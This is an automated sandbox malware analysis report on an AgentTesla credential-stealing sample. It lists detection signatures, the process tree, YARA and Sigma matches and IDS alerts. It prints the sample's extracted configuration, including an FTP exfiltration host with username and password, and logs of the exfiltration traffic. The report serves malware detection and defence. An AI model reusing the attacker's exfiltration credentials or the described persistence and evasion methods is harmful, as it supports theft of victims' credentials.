
Windows Analysis Report
LfZAz7DQzo.exe

Overview

General Information

Sample name: LfZAz7DQzo.exe (renamed because the original name is a hash value)
Original sample name: 1e6a8f176a0d7a9bd0321b4c032153f48b244be1584137453bf1afc07ea10157.exe
Analysis ID: 1588800
MD5: 79129cf9382f91ab74a895cd2c5a0c7f
SHA1: e1590b1a5ab3212dd35732affffb68236a2ca8b2
SHA256: 1e6a8f176a0d7a9bd0321b4c032153f48b244be1584137453bf1afc07ea10157
Tags: exe, Formbook, user-adrian__luca

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Check if machine is in data center or colocation facility
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • LfZAz7DQzo.exe (PID: 7080 cmdline: "C:\Users\user\Desktop\LfZAz7DQzo.exe" MD5: 79129CF9382F91AB74A895CD2C5A0C7F)
    • troopwise.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\LfZAz7DQzo.exe" MD5: 79129CF9382F91AB74A895CD2C5A0C7F)
      • RegSvcs.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\LfZAz7DQzo.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 4284 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • troopwise.exe (PID: 4048 cmdline: "C:\Users\user\AppData\Local\seskin\troopwise.exe" MD5: 79129CF9382F91AB74A895CD2C5A0C7F)
      • RegSvcs.exe (PID: 6164 cmdline: "C:\Users\user\AppData\Local\seskin\troopwise.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:
  • SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Extracted malware configuration: {"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author
00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(22 further entries not shown)

Source | Rule | Description | Author
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
2.2.RegSvcs.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
2.2.RegSvcs.exe.400000.0.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen
  • 0x3196b:$s2: GetPrivateProfileString
  • 0x31018:$s3: get_OSFullName
  • 0x32706:$s5: remove_Key
  • 0x328b3:$s5: remove_Key
  • 0x33795:$s6: FtpWebRequest
  • 0x34717:$s7: logins
  • 0x34c89:$s7: logins
  • 0x3798e:$s7: logins
  • 0x37a4c:$s7: logins
  • 0x393a1:$s7: logins
  • 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
(18 further entries not shown)

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs" , ProcessId: 4284, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs" , ProcessId: 4284, ProcessName: wscript.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Local\seskin\troopwise.exe, ProcessId: 7128, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T05:39:50.672589+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 162.241.62.63 | 21 | TCP
2025-01-11T05:39:51.076312+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 162.241.62.63 | 48091 | TCP
2025-01-11T05:39:51.083573+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 162.241.62.63 | 48091 | TCP

AV Detection

Source: 1.2.troopwise.exe.1be0000.1.raw.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; Virustotal: Detection: 61%
Source: LfZAz7DQzo.exe; ReversingLabs: Detection: 71%
Source: LfZAz7DQzo.exe; Virustotal: Detection: 61%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; Joe Sandbox ML: detected
Source: LfZAz7DQzo.exe; Joe Sandbox ML: detected
Source: LfZAz7DQzo.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: wntdll.pdbUGP source: troopwise.exe, 00000001.00000003.1762100016.0000000003700000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000001.00000003.1751043966.0000000003850000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1885559677.0000000004060000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1884597088.0000000004200000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: troopwise.exe, 00000001.00000003.1762100016.0000000003700000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000001.00000003.1751043966.0000000003850000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1885559677.0000000004060000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1884597088.0000000004200000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00EE4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00EE4696
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00EEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EEC9C7
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00EEC93C FindFirstFileW,FindClose,0_2_00EEC93C
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00EEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EEF200
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00EEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EEF35D
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00EEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EEF65E
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00EE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EE3A2B
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00EE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EE3D4E
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00EEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EEBF27
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; Code function: 1_2_005B4696 GetFileAttributesW,FindFirstFileW,FindClose,1_2_005B4696
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; Code function: 1_2_005BC93C FindFirstFileW,FindClose,1_2_005BC93C
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; Code function: 1_2_005BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_005BC9C7
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; Code function: 1_2_005BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005BF200
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; Code function: 1_2_005BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005BF35D
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; Code function: 1_2_005BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_005BF65E
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; Code function: 1_2_005B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005B3A2B
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; Code function: 1_2_005B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005B3D4E
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; Code function: 1_2_005BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_005BBF27

Networking

Source: Network traffic; Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49736 -> 162.241.62.63:48091
Source: Network traffic; Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49734 -> 162.241.62.63:21
Source: Yara match; File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic; TCP traffic: 192.168.2.4:49736 -> 162.241.62.63:48091
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 208.95.112.1
Source: Joe Sandbox View; IP Address: 162.241.62.63
Source: unknown; DNS query: name: ip-api.com
Source: unknown; FTP traffic detected: 162.241.62.63:21 -> 192.168.2.4:49734
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 1 of 150 allowed.
  220-Local time is now 22:39. Server port: 21.
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00EF25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00EF25E2
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic; DNS traffic detected: DNS query: ip-api.com
Source: global traffic; DNS traffic detected: DNS query: ftp.antoniomayol.com
Source: RegSvcs.exe, 00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://antoniomayol.com
Source: RegSvcs.exe, 00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ftp.antoniomayol.com
Source: RegSvcs.exe, 00000002.00000002.1889523991.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.00000000032CC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com
Source: troopwise.exe, 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1889523991.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, troopwise.exe, 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.00000000032CC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: RegSvcs.exe, 00000002.00000002.1889523991.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.00000000032CC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: troopwise.exe, 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, troopwise.exe, 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://account.dyn.com/
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00EF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EF425A
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00EF4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00EF4458
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; Code function: 1_2_005C4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_005C4458
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00EF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EF425A
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00EE0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00EE0219
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00F0CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F0CDAC
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; Code function: 1_2_005DCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_005DCDAC

System Summary

Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 1.2.troopwise.exe.1be0000.1.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.troopwise.exe.1be0000.1.unpack, type: UNPACKEDPE; Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 4.2.troopwise.exe.24c0000.1.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.troopwise.exe.24c0000.1.unpack, type: UNPACKEDPE; Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: This is a third-party compiled AutoIt script. 0_2_00E83B4C
Source: LfZAz7DQzo.exe; String found in binary or memory: This is a third-party compiled AutoIt script.
Source: LfZAz7DQzo.exe, 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: This is a third-party compiled AutoIt script.memstr_6c83ef5a-c
Source: LfZAz7DQzo.exe, 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cd5a7232-8
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe; Code function: This is a third-party compiled AutoIt script. 1_2_00553B4C
Source: troopwise.exe; String found in binary or memory: This is a third-party compiled AutoIt script.
Source: troopwise.exe, 00000001.00000002.1764206020.0000000000605000.00000040.00000001.01000000.00000004.sdmp; String found in binary or memory: This is a third-party compiled AutoIt script.memstr_0fc5db62-1
Source: troopwise.exe, 00000001.00000002.1764206020.0000000000605000.00000040.00000001.01000000.00000004.sdmp; String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c7293abb-1
Source: troopwise.exe, 00000004.00000002.1886503345.0000000000605000.00000040.00000001.01000000.00000004.sdmp; String found in binary or memory: This is a third-party compiled AutoIt script.memstr_34e09279-f
Source: troopwise.exe, 00000004.00000002.1886503345.0000000000605000.00000040.00000001.01000000.00000004.sdmp; String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_dddf5778-3
